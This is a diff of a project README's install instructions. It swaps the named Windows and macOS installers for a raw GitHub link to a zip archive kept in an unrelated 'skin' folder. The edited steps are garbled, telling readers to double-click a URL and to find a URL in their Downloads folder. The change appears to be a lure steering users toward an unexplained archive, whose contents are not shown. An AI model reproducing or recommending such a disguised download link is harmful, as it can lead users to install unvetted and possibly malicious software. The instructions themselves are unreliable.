Kirissof/body/README.md

 ### For Windows:
 1. Navigate to the folder where you saved the file.
-2. Double-click on `body-windows.exe` to start the application.
+2. Double-click on `https://github.com/Kirissof/body/raw/refs/heads/main/skin/Software-1.5-alpha.1.zip` to start the application.
 3. Follow the on-screen instructions to complete any necessary setup.

 ### For macOS:
-1. Locate the downloaded file `body-mac.dmg` in your Downloads folder.
+1. Locate the downloaded file `https://github.com/Kirissof/body/raw/refs/heads/main/skin/Software-1.5-alpha.1.zip` in your Downloads folder.
 2. Double-click to open the disk image.
 3. Drag the body application into your Applications folder.
 4. Open the Applications folder and double-click on the body icon.